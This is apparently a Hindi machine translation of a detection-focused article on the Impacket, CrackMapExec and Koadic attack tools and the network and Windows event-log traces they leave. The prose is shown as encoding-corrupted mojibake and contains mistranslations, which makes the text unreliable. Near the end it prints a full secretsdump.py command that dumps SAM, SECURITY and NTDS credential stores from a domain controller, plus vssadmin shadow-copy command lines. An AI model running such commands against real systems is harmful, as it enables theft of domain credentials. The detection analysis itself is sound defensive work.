
рдХреЙрд░реНрдкреЛрд░реЗрдЯ рд╕реЗрдХреНрдЯрд░ рдореЗрдВ рд╣рдорд▓реЛрдВ рдХреА рд╕рдВрдЦреНрдпрд╛ рд╣рд░ рд╕рд╛рд▓ рдмрдврд╝ рд░рд╣реА рд╣реИ: рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП,
2017 рдореЗрдВ, 2016 рдХреА рддреБрд▓рдирд╛ рдореЗрдВ
13% рдЕрдзрд┐рдХ рдЕрдиреЛрдЦреА рдШрдЯрдирд╛рдПрдВ рджрд░реНрдЬ рдХреА
рдЧрдИрдВ рдФрд░ 2018 рдХреЗ рдЕрдВрдд рддрдХ, рдкрд┐рдЫрд▓реА рдЕрд╡рдзрд┐ рдХреА рддреБрд▓рдирд╛ рдореЗрдВ
27% рдЕрдзрд┐рдХ рдШрдЯрдирд╛рдПрдВ рджрд░реНрдЬ рдХреА
рдЧрдИрдВ ред рдЙрди рд▓реЛрдЧреЛрдВ рдХреЛ рд╢рд╛рдорд┐рд▓ рдХрд░рдирд╛ рдЬрд╣рд╛рдВ рдореБрдЦреНрдп рдХрд╛рдо рдХрд░рдиреЗ рд╡рд╛рд▓рд╛ рдЙрдкрдХрд░рдг рд╡рд┐рдВрдбреЛрдЬ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рд╣реИред 2017-2018 рдореЗрдВ, APT Dragonfly, APT28,
APT рдордбреНрдбреАрд╡реЙрдЯрд░ рд╕рдореВрд╣реЛрдВ рдиреЗ рдпреВрд░реЛрдк, рдЙрддреНрддрд░реА рдЕрдореЗрд░рд┐рдХрд╛ рдФрд░ рд╕рдКрджреА рдЕрд░рдм рдореЗрдВ рд╕рд░рдХрд╛рд░ рдФрд░ рд╕реИрдиреНрдп рд╕рдВрдЧрдардиреЛрдВ рдкрд░ рд╣рдорд▓рд╛ рдХрд┐рдпрд╛ред рдФрд░ рдЙрдиреНрд╣реЛрдВрдиреЗ рдЗрд╕рдХреЗ рд▓рд┐рдП рддреАрди рдЯреВрд▓ рдХрд╛ рдЗрд╕реНрддреЗрдорд╛рд▓ рдХрд┐рдпрд╛ -
рдЗрдореНрдкреИрдХреЗрдЯ ,
рдХреНрд░реИрдХрдкрд╛рдЙрдЬрд╝реЗрд╕рд┐рдХ рдФрд░
рдХреЛрдПрдбрд┐рдХ ред рдЙрдирдХрд╛ рд╕реЛрд░реНрд╕ рдХреЛрдб рдЦреБрд▓рд╛ рдФрд░ GitHub рдкрд░ рдЙрдкрд▓рдмреНрдз рд╣реИред
рдпрд╣ рдзреНрдпрд╛рди рджреЗрдиреЗ рдпреЛрдЧреНрдп рд╣реИ рдХрд┐ рдЗрди рдЙрдкрдХрд░рдгреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдкреНрд░рд╛рд░рдВрднрд┐рдХ рдкреИрда рдХреЗ рд▓рд┐рдП рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдмрд▓реНрдХрд┐ рдмреБрдирд┐рдпрд╛рджреА рдврд╛рдВрдЪреЗ рдХреЗ рднреАрддрд░ рдПрдХ рд╣рдорд▓реЗ рдХреЗ рд╡рд┐рдХрд╛рд╕ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдкрд░рд┐рдзрд┐ рдкрд░ рдХрд╛рдмреВ рдкрд╛рдиреЗ рдХреЗ рдмрд╛рдж рд╣рдорд▓рд╛рд╡рд░, рд╣рдорд▓реЗ рдХреЗ рд╡рд┐рднрд┐рдиреНрди рдЪрд░рдгреЛрдВ рдореЗрдВ рдЙрдирдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред рдЗрд╕ рддрд░рд╣,
рдиреЗрдЯрд╡рд░реНрдХ рдЯреНрд░реИрдлрд┐рдХ рдпрд╛ рдФрдЬрд╛рд░реЛрдВ
рдореЗрдВ рд╕рдордЭреМрддреЗ рдХреЗ рдирд┐рд╢рд╛рди рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдХреЗрд╡рд▓ рддрдХрдиреАрдХ рдХреА рдорджрдж рд╕реЗ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рдореБрд╢реНрдХрд┐рд▓ рд╣реЛрддрд╛ рд╣реИ рдФрд░
рдмреБрдирд┐рдпрд╛рджреА рдврд╛рдВрдЪреЗ рдореЗрдВ рдШреБрд╕рдиреЗ рдХреЗ рдмрд╛рдж рдХрд┐рд╕реА рд╣рдорд▓рд╛рд╡рд░ рдХреА рд╕рдХреНрд░рд┐рдп рдХреНрд░рд┐рдпрд╛рдУрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛ рд╕рдХрддрд╛ рд╣реИред рдЙрдкрдХрд░рдг рдХрдИ рдХрд╛рд░реНрдп рдкреНрд░рджрд╛рди рдХрд░рддреЗ рд╣реИрдВ - рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреЗ рд╕рд╛рде рдлрд╛рдЗрд▓ рдХреЛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░рдиреЗ рд╕реЗ рд▓реЗрдХрд░ рд░рд┐рдореЛрдЯ рдорд╢реАрди рдкрд░ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рддрдХред рд╣рдордиреЗ рдЙрдирдХреА рдиреЗрдЯрд╡рд░реНрдХ рдЧрддрд┐рд╡рд┐рдзрд┐ рдХреЛ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЗрди рдЙрдкрдХрд░рдгреЛрдВ рдХрд╛ рдЕрдзреНрдпрдпрди рдХрд┐рдпрд╛ред
рд╣рдореЗрдВ рдХреНрдпрд╛ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ:
- рд╕рдордЭреЗрдВ рдХрд┐ рд╣реИрдХрд┐рдВрдЧ рдЯреВрд▓ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддреЗ рд╣реИрдВ ред рдкрддрд╛ рдХрд░реЗрдВ рдХрд┐ рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ рдХреНрдпрд╛ рдХрд╛рдо рдХрд░рдирд╛ рд╣реИ рдФрд░ рд╡реЗ рдХрд┐рди рддрдХрдиреАрдХреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
- рдПрдХ рд╣рдорд▓реЗ рдХреЗ рдкрд╣рд▓реЗ рдЪрд░рдгреЛрдВ рдореЗрдВ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрдХрд░рдгреЛрдВ рджреНрд╡рд╛рд░рд╛ рдХреНрдпрд╛ рдкрддрд╛ рдирд╣реАрдВ рд▓рдЧрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ ред рдЦреБрдлрд┐рдпрд╛ рдЪрд░рдг рдХреЛ рдЫреЛрдбрд╝ рджрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рдпрд╛ рддреЛ рдХреНрдпреЛрдВрдХрд┐ рд╣рдорд▓рд╛рд╡рд░ рдПрдХ рдЖрдВрддрд░рд┐рдХ рд╣рдорд▓рд╛рд╡рд░ рд╣реИ, рдпрд╛ рдХреНрдпреЛрдВрдХрд┐ рд╣рдорд▓рд╛рд╡рд░ рдмреБрдирд┐рдпрд╛рджреА рдврд╛рдВрдЪреЗ рдореЗрдВ рдПрдХ рдЕрдВрддрд░ рдХрд╛ рд╢реЛрд╖рдг рдХрд░рддрд╛ рд╣реИ рдЬреЛ рдкрд╣рд▓реЗ рдЬреНрдЮрд╛рдд рдирд╣реАрдВ рдерд╛ред рдЙрд╕рдХреЗ рдХрд╛рд░реНрдпреЛрдВ рдХреА рдкреВрд░реА рд╢реНрд░реГрдВрдЦрд▓рд╛ рдХреЛ рдмрд╣рд╛рд▓ рдХрд░рдиреЗ рдХрд╛ рдПрдХ рдЕрд╡рд╕рд░ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдЖрдЧреЗ рдХреЗ рдЖрдВрджреЛрд▓рди рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреА рдЗрдЪреНрдЫрд╛ рд╣реИред
- рдШреБрд╕рдкреИрда рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рд╡рд╛рд▓реЗ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рдЭреВрдареЗ рдЕрд▓рд╛рд░реНрдо рдХреЛ рд╣рдЯрд╛ рджреЗрдВ ред рд╣рдореЗрдВ рдпрд╣ рдирд╣реАрдВ рднреВрд▓рдирд╛ рдЪрд╛рд╣рд┐рдП рдХрд┐ рдЕрдХреЗрд▓реЗ рдмреБрджреНрдзрд┐рдорддреНрддрд╛ рдХреЗ рдЖрдзрд╛рд░ рдкрд░ рдХреБрдЫ рдХреНрд░рд┐рдпрд╛рдУрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдкрд░, рдЕрдХреНрд╕рд░ рддреНрд░реБрдЯрд┐рдпрд╛рдВ рд╕рдВрднрд╡ рд╣реИрдВред рдЖрдорддреМрд░ рдкрд░ рдмреБрдирд┐рдпрд╛рджреА рдврд╛рдВрдЪреЗ рдореЗрдВ рдХрд┐рд╕реА рднреА рдЬрд╛рдирдХрд╛рд░реА рдХреЛ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡реИрдз рддрд░реАрдХреЗ рд╕реЗ рдкрд░реНрдпрд╛рдкреНрдд рд╕рдВрдЦреНрдпрд╛ рдореЗрдВ, рдкрд╣рд▓реА рдирдЬрд╝рд░ рдореЗрдВ рдЕрд╡рд┐рд╡реЗрдЪреНрдп рд╣реИрдВред
рдпреЗ рдЙрдкрдХрд░рдг рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ рдХреНрдпрд╛ рджреЗрддреЗ рд╣реИрдВ? рдпрджрд┐ рдпрд╣ рдЗрдореНрдкреИрдХреЗрдЯ рд╣реИ, рддреЛ рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ рдореЙрдбреНрдпреВрд▓ рдХреА рдПрдХ рдмрдбрд╝реА рд▓рд╛рдЗрдмреНрд░реЗрд░реА рдорд┐рд▓рддреА рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдкрд░рд┐рдзрд┐ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЯреВрдЯрдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдорд▓реЗ рдХреЗ рд╡рд┐рднрд┐рдиреНрди рдЪрд░рдгреЛрдВ рдореЗрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдХрдИ рдЙрдкрдХрд░рдг рдЗрдореНрдкреЗрдХреЗрдЯ рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдЦреБрдж рдХреЗ рдЕрдВрджрд░ рдХрд░рддреЗ рд╣реИрдВ - рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдореЗрдЯрд╕реНрдкреНрд▓реЛрдЗрдЯред рдЗрд╕рдореЗрдВ рд░рд┐рдореЛрдЯ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП dcomexec рдФрд░ wmiexec рд╣реИ, рдЬреЛ рдЗрдореНрдкреЗрд╕реЗрдЯ рд╕реЗ рдЬреЛрдбрд╝реЗ рдЧрдП рдореЗрдореЛрд░реА рд╕реЗ рдЦрд╛рддреЛрдВ рдХреЛ рдкреБрдирдГ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕реАрдХреНрд░реЗрдЯрдбрдореНрдк рд╣реИред рдирддреАрдЬрддрди, рдЗрд╕ рддрд░рд╣ рдХреЗ рдкреБрд╕реНрддрдХрд╛рд▓рдп рдХреА рдЧрддрд┐рд╡рд┐рдзрд┐ рдХрд╛ рд╕рд╣реА рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рднреА рдбреЗрд░рд┐рд╡реЗрдЯрд┐рд╡ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░реЗрдЧрд╛ред
CrackMapExec (рдпрд╛ рд╕рд┐рд░реНрдл CME) рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ, рд╕рдВрдпреЛрдЧ рд╕реЗ рд░рдЪрдирд╛рдХрд╛рд░реЛрдВ рдиреЗ "рдЗрдореНрдкреИрдХреНрдЯ рджреНрд╡рд╛рд░рд╛ рд╕рдВрдЪрд╛рд▓рд┐рдд" рд▓рд┐рдЦрд╛ред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рд╕реАрдПрдордИ рдореЗрдВ рд▓реЛрдХрдкреНрд░рд┐рдп рдкрд░рд┐рджреГрд╢реНрдпреЛрдВ рдХреЗ рд▓рд┐рдП рддреИрдпрд╛рд░ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рд╣реИ: рдпрд╣ рдкрд╛рд╕рд╡рд░реНрдб рдпрд╛ рдЙрдирдХреЗ рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП Mimikatz рд╣реИ, рдФрд░ рд░рд┐рдореЛрдЯ рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП рдореАрдЯрд░рдкрд░реЗрдЯрд░ рдпрд╛ рдПрдореНрдкрд╛рдпрд░ рдПрдЬреЗрдВрдЯ рдХрд╛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдФрд░ рдмреЛрд░реНрдб рдкрд░ рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рд╣реИред
рддреАрд╕рд░рд╛ рдЙрдкрдХрд░рдг рдЬрд┐рд╕реЗ рд╣рдордиреЗ рдЪреБрдирд╛ рд╣реИ рд╡рд╣ рд╣реИ Koadicред рдпрд╣ рдХрд╛рдлреА рддрд╛рдЬрд╝рд╛ рд╣реИ, 2017 рдореЗрдВ DEFCON 25 рдЕрдВрддрд░рд░рд╛рд╖реНрдЯреНрд░реАрдп рд╣реИрдХрд░ рд╕рдореНрдореЗрд▓рди рдореЗрдВ рдкреНрд░рд╕реНрддреБрдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ рдФрд░ рдЗрд╕рдореЗрдВ рдПрдХ рдЧреИрд░-рдорд╛рдирдХ рджреГрд╖реНрдЯрд┐рдХреЛрдг рд╣реИ: HTTP, рдЬрд╛рд╡рд╛ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдФрд░ Microsoft рд╡рд┐рдЬрд╝реБрдЕрд▓ рдмреЗрд╕рд┐рдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ (VBS) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрд╛рдо рдХрд░рдирд╛ред рдЗрд╕ рджреГрд╖реНрдЯрд┐рдХреЛрдг рдХреЛ рднреВрдорд┐ рд╕реЗ рджреВрд░ рд░рд╣рдирд╛ рдХрд╣рд╛ рдЬрд╛рддрд╛ рд╣реИ: рдЙрдкрдХрд░рдг рд╡рд┐рдВрдбреЛрдЬ рдореЗрдВ рдирд┐рд░реНрдорд┐рдд рдирд┐рд░реНрднрд░рддрд╛ рдФрд░ рдкреБрд╕реНрддрдХрд╛рд▓рдпреЛрдВ рдХреЗ рдПрдХ рд╕реЗрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред рдирд┐рд░реНрдорд╛рддрд╛ рдЗрд╕реЗ COM рдХрдорд╛рдВрдб рдХрдВрдЯреНрд░реЛрд▓ рдпрд╛ C3 рдХрд╣рддреЗ рд╣реИрдВред
IMPACKET
Impacket рдХреА рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдмрд╣реБрдд рд╡рд┐рд╕реНрддреГрдд рд╣реИ, AD рдХреЗ рдЕрдВрджрд░ рдЯреЛрд╣реА рд╕реЗ рд╢реБрд░реВ рд╣реЛрддреА рд╣реИ рдФрд░ рдЖрдВрддрд░рд┐рдХ MS SQL рд╕рд░реНрд╡рд░ рд╕реЗ рдбреЗрдЯрд╛ рдПрдХрддреНрд░ рдХрд░рддреА рд╣реИ, рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рддрдХрдиреАрдХреЛрдВ рдХреЗ рд╕рд╛рде рд╕рдорд╛рдкреНрдд рд╣реЛрддреА рд╣реИ: рдпрд╣ рдПрдХ SMB рд░рд┐рд▓реЗ рдЕрдЯреИрдХ рд╣реИ рдФрд░ рдПрдХ ntds.dit рдлрд╝рд╛рдЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рд╕реЗ рдирд╖реНрдЯ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред рдЗрдореНрдкреЗрдХреЗрдЯ рдЪрд╛рд░ рдЕрд▓рдЧ-рдЕрд▓рдЧ рддрд░реАрдХреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рджреВрд░рд╕реНрде рд░реВрдк рд╕реЗ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддрд╛ рд╣реИ: рдбрдмреНрд▓реВрдПрдордЖрдИ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ, рд╡рд┐рдВрдбреЛрдЬ рдЕрдиреБрд╕реВрдЪрдХ, рдбреАрд╕реАрдУрдПрдо рдФрд░ рдПрд╕рдПрдордмреА рдХреЗ рдкреНрд░рдмрдВрдзрди рдХреЗ рд▓рд┐рдП рдПрдХ рд╕реЗрд╡рд╛, рдФрд░ рдЗрд╕рдХреЗ рд▓рд┐рдП рдЗрд╕реЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред
Secretsdump
рдЖрдЗрдП рд░рд╣рд╕реНрдпреЛрдВ рдХреЛ рджреЗрдЦреЗрдВред рдпрд╣ рдПрдХ рдореЙрдбреНрдпреВрд▓ рд╣реИ рдЬрд┐рд╕рдХрд╛ рдЙрджреНрджреЗрд╢реНрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдорд╢реАрдиреЛрдВ рдФрд░ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХреЛрдВ рджреЛрдиреЛрдВ рд╣реЛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ, рдЖрдк LSA, SAM, SECURITY, NTDS.dit рдореЗрдореЛрд░реА рдХреНрд╖реЗрддреНрд░реЛрдВ рдХреА рдкреНрд░рддрд┐рдпрд╛рдВ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдЗрд╕реЗ рд╣рдорд▓реЗ рдХреЗ рд╡рд┐рднрд┐рдиреНрди рдЪрд░рдгреЛрдВ рдореЗрдВ рджреЗрдЦрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рдВрдЪрд╛рд▓рди рдореЗрдВ рдкрд╣рд▓рд╛ рдХрджрдо рдПрд╕рдПрдордмреА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╣реИ, рдЬрд┐рд╕рдХреЗ рд▓рд┐рдП рдкрд╛рд╕ рд╣реИрд╢ рд╣рдорд▓реЗ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рд╕рдВрдЪрд╛рд▓рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдпрд╛ рдЗрд╕рдХреЗ рд╣реИрд╢ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИред рдЕрдЧрд▓рд╛, рд╕реЗрд╡рд╛ рдирд┐рдпрдВрддреНрд░рдг рдкреНрд░рдмрдВрдзрдХ (SCM) рддрдХ рдкрд╣реБрдВрдЪ рдЦреЛрд▓рдиреЗ рдФрд░ рд╡рд┐рдирд░ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рддрдХ рдкрд╣реБрдВрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХрд╛ рдЕрдиреБрд░реЛрдз рд╣реИ, рдЬрд┐рд╕рдХреЗ рдЙрдкрдпреЛрдЧ рд╕реЗ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдЙрди рд╢рд╛рдЦрд╛рдУрдВ рдХреЗ рдбреЗрдЯрд╛ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛ рд╕рдХрддрд╛ рд╣реИ рдЬреЛ рдЙрд╕рдХреА рд░реБрдЪрд┐ рд░рдЦрддреЗ рд╣реИрдВ рдФрд░ рдПрд╕рдПрдордмреА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкрд░рд┐рдгрд╛рдо рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдЕрдВрдЬреАрд░ рдореЗрдВред 1 рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рдПрд▓рдПрд╕рдП рдХреЗ рд╕рд╛рде рд░рдЬрд┐рд╕реНрдЯрд░ рдХреБрдВрдЬреА рджреНрд╡рд╛рд░рд╛ рд╡рд┐рдирд░ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдПрдХреНрд╕реЗрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╕рдордп рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдХреИрд╕реЗ рдкреНрд░рд╛рдкреНрдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, DCERPC рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ opcode 15 - OpenKey рдХреЗ рд╕рд╛рде рдХрд░реЗрдВред
рдЕрдВрдЬреАрд░ред 1. winreg рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА рдХреЛ рдЦреЛрд▓рдирд╛рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдЬрдм рдХреБрдВрдЬреА рдкрд╣реБрдВрдЪ рдкреНрд░рд╛рдкреНрдд рд╣реЛрддреА рд╣реИ, рддреЛ рдУрдкрдХреЛрдб 20 рдХреЗ рд╕рд╛рде SaveKey рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдорд╛рдиреЛрдВ рдХреЛ рдмрдЪрд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЗрдореНрдкреЗрдХреЗрдЯ рдЗрд╕реЗ рдмрд╣реБрдд рд╡рд┐рд╢рд┐рд╖реНрдЯ рдмрдирд╛рддрд╛ рд╣реИред рдпрд╣ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдХреЗ рдорд╛рди рдХреЛ рдмрдЪрд╛рддрд╛ рд╣реИ рдЬрд┐рд╕рдХрд╛ рдирд╛рдо .tmp рдХреЗ рд╕рд╛рде 8 рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рд╡рд░реНрдгреЛрдВ рдХрд╛ рдПрдХ рд╕реНрдЯреНрд░рд┐рдВрдЧ рд╣реИред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдЗрд╕ рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдЖрдЧреЗ рдЕрдирд▓реЛрдбрд┐рдВрдЧ S32 рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ System32 рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ (рдЫрд╡рд┐ 2) рд╕реЗ рд╣реЛрддрд╛ рд╣реИред
рдЕрдВрдЬреАрд░ред 2. рджреВрд░рд╕реНрде рдорд╢реАрди рд╕реЗ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдпреЛрдЬрдирд╛рдпрд╣ рдкрддрд╛ рдЪрд▓рд╛ рд╣реИ рдХрд┐ рдЖрдк рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рдРрд╕реА рдЧрддрд┐рд╡рд┐рдзрд┐ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛ рд╕рдХрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ рдХреБрдЫ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рд╢рд╛рдЦрд╛рдУрдВ рдХреЛ рдЬреАрддрдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░реЛрдЯреЛрдХреЙрд▓, рд╡рд┐рд╢рд┐рд╖реНрдЯ рдирд╛рдореЛрдВ, рдЖрджреЗрд╢реЛрдВ рдФрд░ рдЙрдирдХреЗ рдЖрджреЗрд╢ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред
рдпрд╣ рдореЙрдбреНрдпреВрд▓ рд╡рд┐рдВрдбреЛрдЬ рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧ рдореЗрдВ рдирд┐рд╢рд╛рди рднреА рдЫреЛрдбрд╝ рджреЗрддрд╛ рд╣реИ, рдЬрд┐рд╕рдХреЗ рдХрд╛рд░рдг рдпрд╣ рдЖрд╕рд╛рдиреА рд╕реЗ рдкрддрд╛ рд▓рдЧрд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдПрдХ рдЖрджреЗрд╢ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
Windows Server 2016 рд▓реЙрдЧ рдЗрди рдореЗрдВ, рд╣рдо рдШрдЯрдирд╛рдУрдВ рдХреЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдореБрдЦреНрдп рдЕрдиреБрдХреНрд░рдо рджреЗрдЦреЗрдВрдЧреЗ:
1. 4624 - рд░рд┐рдореЛрдЯ рд▓реЛрдЧрдиред
2. 5145 - рд╕реБрджреВрд░ winreg рд╕реЗрд╡рд╛ рддрдХ рдкрд╣реБрдВрдЪ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рд╕рддреНрдпрд╛рдкрдиред
3. 5145 - System32 рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рдлрд╝рд╛рдЗрд▓ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЬрд╛рдБрдЪред рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдКрдкрд░ рдЙрд▓реНрд▓рд┐рдЦрд┐рдд рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдирд╛рдо рд╣реИред
4. 4688 - vssadmin рд▓реЙрдиреНрдЪ рдХрд░рдиреЗ рд╡рд╛рд▓реА cmd.exe рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдмрдирд╛рдирд╛:
тАЬC:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
5. 4688 - рдХрдорд╛рдВрдб рдХреЗ рд╕рд╛рде рдПрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдмрдирд╛рдирд╛:
"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
